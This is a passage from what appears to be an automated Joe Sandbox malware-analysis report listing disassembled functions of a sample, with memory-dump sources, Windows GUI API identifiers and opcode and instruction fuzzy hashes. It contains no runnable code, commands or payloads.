                                                                            • Opcode Fuzzy Hash: ab8f0232e0cf3400e01600403f30409ece02e0b2b4268008a1f0eee4b1d6d50b
                                                                            • Instruction Fuzzy Hash: 19011E74200A0186FB639B67E8D87EB63E1A70C7D4F548035EB44876F8DBB9CC858B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014017A82C Relevance: 6.3, APIs: 4, Instructions: 339COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Inflate$Fill
                                                                            • String ID:
                                                                            • API String ID: 309753019-0
                                                                            • Opcode ID: d13bfcb1eb00d343997370fc84fdc03c27faf0a6d897f8f00006e03df2861629
                                                                            • Instruction ID: 29d9f51bf4d69200187b024e01464fbc54c613400533d7bcc060ba0a8552b789
                                                                            • Opcode Fuzzy Hash: d13bfcb1eb00d343997370fc84fdc03c27faf0a6d897f8f00006e03df2861629
                                                                            • Instruction Fuzzy Hash: 34E1CE36714A8186EB16DB66D4447ED33A1F78CF94F488226EF4A57BA5DF38C846CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400DC054 Relevance: 6.3, APIs: 4, Instructions: 318COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ColorExtentPoint32
                                                                            • String ID:
                                                                            • API String ID: 3889842664-0
                                                                            • Opcode ID: fa00ac69310722e6ffc6f1bc36fcb9f291203d11b301b2fbd182a99a97bdd50f
                                                                            • Instruction ID: 3ea763f5d17c414e97b46d3ec7a792c3b48eae0745338f3ad13006c6cf56271c
                                                                            • Opcode Fuzzy Hash: fa00ac69310722e6ffc6f1bc36fcb9f291203d11b301b2fbd182a99a97bdd50f
                                                                            • Instruction Fuzzy Hash: 46E14837710691CAE715CFAAD484BAD37A1F74CB88F15822AEF4993B59DB34D841CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140124538 Relevance: 6.3, APIs: 4, Instructions: 259COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyRect
                                                                            • String ID:
                                                                            • API String ID: 2270935405-0
                                                                            • Opcode ID: fd655b54ac32e1a7385abd6d01793a0f2c5e3e9597ed8bfb7daffdee8236011d
                                                                            • Instruction ID: 85f7bf9fc6d4eb9bca599a792dee972ed5d2177abe9d0ead8c77f84b8b7838ab
                                                                            • Opcode Fuzzy Hash: fd655b54ac32e1a7385abd6d01793a0f2c5e3e9597ed8bfb7daffdee8236011d
                                                                            • Instruction Fuzzy Hash: 7AA178B26106818BEB59CF7ADA54BED37A1F74CB48F088129DF46A77A4DB34E450CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401B051C Relevance: 6.2, APIs: 4, Instructions: 202COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Inflate$ClientMetricsSystem$CopyEnableExceptionOffsetThrowWindow
                                                                            • String ID:
                                                                            • API String ID: 4014177440-0
                                                                            • Opcode ID: 7d110590321d132fb8ae4f87cef2983def826f1779396d45df1a61a149f4e450
                                                                            • Instruction ID: 541c7727f85d37a0d7b3c1fe3cb0d094500469ccbf0759f0595be4bbb0929986
                                                                            • Opcode Fuzzy Hash: 7d110590321d132fb8ae4f87cef2983def826f1779396d45df1a61a149f4e450
                                                                            • Instruction Fuzzy Hash: 30918E32600A8086EB26EB67E4447DE77B0F78CB94F144125EF8A57BA5DF78D551CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140006230 Relevance: 6.2, APIs: 4, Instructions: 197COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo$ExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 2961551908-0
                                                                            • Opcode ID: e216caddd65bec29fa6e9bafa07c7fd93960c7b3078ec20aab452979d5afa4d7
                                                                            • Instruction ID: cfd7c19b0af8b7e9eb9ffe2fa79957c28641364e46fd532d574e4ef77482dde7
                                                                            • Opcode Fuzzy Hash: e216caddd65bec29fa6e9bafa07c7fd93960c7b3078ec20aab452979d5afa4d7
                                                                            • Instruction Fuzzy Hash: 3561E1B1701A40C6EA16EF7BF0843ED63A2AB4CBC0F648125BB59277B6CF39C5518740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400AC408 Relevance: 6.2, APIs: 4, Instructions: 197COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$EmptyParentRedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 3364553503-0
                                                                            • Opcode ID: 197682ab573342bfc396990fec3d2c992254b4f9af3ef9eae4350b943b3fc8d9
                                                                            • Instruction ID: 9daf499628feec045285e9e2cf471812cb1dce3e1f44d8e5520f13469bbb1221
                                                                            • Opcode Fuzzy Hash: 197682ab573342bfc396990fec3d2c992254b4f9af3ef9eae4350b943b3fc8d9
                                                                            • Instruction Fuzzy Hash: 2991C13262168087E75ACF2AD148BED33A1F3DCBC9F154225EB49476A6DB35D8C28F04
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140176150 Relevance: 6.2, APIs: 4, Instructions: 193stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$lstrcmp$ExceptionFlagsFreeLockThrowUnlock
                                                                            • String ID:
                                                                            • API String ID: 3532356804-0
                                                                            • Opcode ID: 50e71cd455c87fad4b0fa71edb1b8a2932b2d57fa84707c2030d8b0fea4551ca
                                                                            • Instruction ID: 318dc905bf5b4c5b0bd3ab1b2ebca4ce5b59ec7c09429c753b19c079386a4ea2
                                                                            • Opcode Fuzzy Hash: 50e71cd455c87fad4b0fa71edb1b8a2932b2d57fa84707c2030d8b0fea4551ca
                                                                            • Instruction Fuzzy Hash: 62917936211A8086EB66EF36D4857ED3360FB88B94F444226EB6E577B6DF38C944C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C4214 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: EnableRectScroll$ClientInflateInfoMetricsSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 3090651611-0
                                                                            • Opcode ID: 3ee5b264e38b3ff192662d686a090c290409bd91c861a4d39cef7a6272de39bf
                                                                            • Instruction ID: f977e3edb861ca0794cc7b17785d4a2bd6d6843070be1e8e9a37c6c89cd0262e
                                                                            • Opcode Fuzzy Hash: 3ee5b264e38b3ff192662d686a090c290409bd91c861a4d39cef7a6272de39bf
                                                                            • Instruction Fuzzy Hash: B68168327042809BE719DF7AD5547EC73A0F788B88F454129EB0987B68DB35DA65CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400B06AC Relevance: 6.2, APIs: 4, Instructions: 178COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$InvalidateRectUpdate
                                                                            • String ID:
                                                                            • API String ID: 1651931182-0
                                                                            • Opcode ID: c243d935af2660b80f97fbcdb0790e411a4bd0143bdc1fb6e8ab40cc29db7fa7
                                                                            • Instruction ID: 8cdcc92cd21918040455a9667b905f13d05d5064944b200b2e47dcd7bc93d651
                                                                            • Opcode Fuzzy Hash: c243d935af2660b80f97fbcdb0790e411a4bd0143bdc1fb6e8ab40cc29db7fa7
                                                                            • Instruction Fuzzy Hash: 40619F72608A809BFB6ADFA795007E9B7A0F788BC4F044025EF4947BA1DF74D592CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140082874 Relevance: 6.2, APIs: 4, Instructions: 175COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Delete
                                                                            • String ID:
                                                                            • API String ID: 774837909-0
                                                                            • Opcode ID: 296b89678d03188ea4e09d1adb7123b4468198a82ca25111ada9a1c14ef60224
                                                                            • Instruction ID: 94ca4c5b5786f92036efdb03593abfb50c36281383342a29c7c32150c3b15827
                                                                            • Opcode Fuzzy Hash: 296b89678d03188ea4e09d1adb7123b4468198a82ca25111ada9a1c14ef60224
                                                                            • Instruction Fuzzy Hash: A2717932600A40A6FB6BDB23E8547EA23A0FB4CBA4F440125FF5A576E1DB78CA55C341
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401FE840 Relevance: 6.2, APIs: 4, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                            • String ID:
                                                                            • API String ID: 72036449-0
                                                                            • Opcode ID: 6aa7ff4dec2bfdef2408aba458350025f3c0d66cc54d5fc57fc66fb2593048ec
                                                                            • Instruction ID: 6e9c5a72e3b5b32b9319e9fac3456f0ee59103d3679ef32331b89feb58a59482
                                                                            • Opcode Fuzzy Hash: 6aa7ff4dec2bfdef2408aba458350025f3c0d66cc54d5fc57fc66fb2593048ec
                                                                            • Instruction Fuzzy Hash: 0D51E03260020086FBB76E2BD4A53FE6AC0F328F58F59452DDB55972F6C2B8C840C762
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401106C0 Relevance: 6.2, APIs: 4, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$ExceptionOffsetThrowWindow
                                                                            • String ID:
                                                                            • API String ID: 4150091248-0
                                                                            • Opcode ID: 9af650d9dcb5484e337abaa068c6955f29ab7740ba01b20c08acbac8839a8ea0
                                                                            • Instruction ID: 8a1c26b77feed74558595aeb6a628559f467eba274a8a8af3e6091a0176e368b
                                                                            • Opcode Fuzzy Hash: 9af650d9dcb5484e337abaa068c6955f29ab7740ba01b20c08acbac8839a8ea0
                                                                            • Instruction Fuzzy Hash: 9F51BB32F146648AFB6ADB6AD5447ED33B1AB4CB88F044415DF492BAA4DBB4D441CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140066538 Relevance: 6.1, APIs: 4, Instructions: 145windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureMessageSend$Release
                                                                            • String ID:
                                                                            • API String ID: 1381443029-0
                                                                            • Opcode ID: 130637b41f5ecdbba1b6c5a2155b10a88b27904b38b15ae13d075ed122d24f96
                                                                            • Instruction ID: a36688fbb70ee17e83d82ee300face91706eb40fd8209580243487520725c84d
                                                                            • Opcode Fuzzy Hash: 130637b41f5ecdbba1b6c5a2155b10a88b27904b38b15ae13d075ed122d24f96
                                                                            • Instruction Fuzzy Hash: F0516E36314A8082EA56EB67E9447AE27A1FB8CFC4F284422EF4D47B65CF79C851C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400DC520 Relevance: 6.1, APIs: 4, Instructions: 142COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Move$OffsetRectSelect
                                                                            • String ID:
                                                                            • API String ID: 3256611858-0
                                                                            • Opcode ID: 63fcf81fc162e47482e8aa95a1c6a35356178738299d7ee499c48580ff5682eb
                                                                            • Instruction ID: 994fe58c9d9472b1a24a10abcba1cbd84e65e2f2b2dae64c380bbeeb1d277c6e
                                                                            • Opcode Fuzzy Hash: 63fcf81fc162e47482e8aa95a1c6a35356178738299d7ee499c48580ff5682eb
                                                                            • Instruction Fuzzy Hash: CB517C72B206508AE711DFBAD841BDD77B1B78C798F048612EF4967AA8CB38D945CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140166688 Relevance: 6.1, APIs: 4, Instructions: 142windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
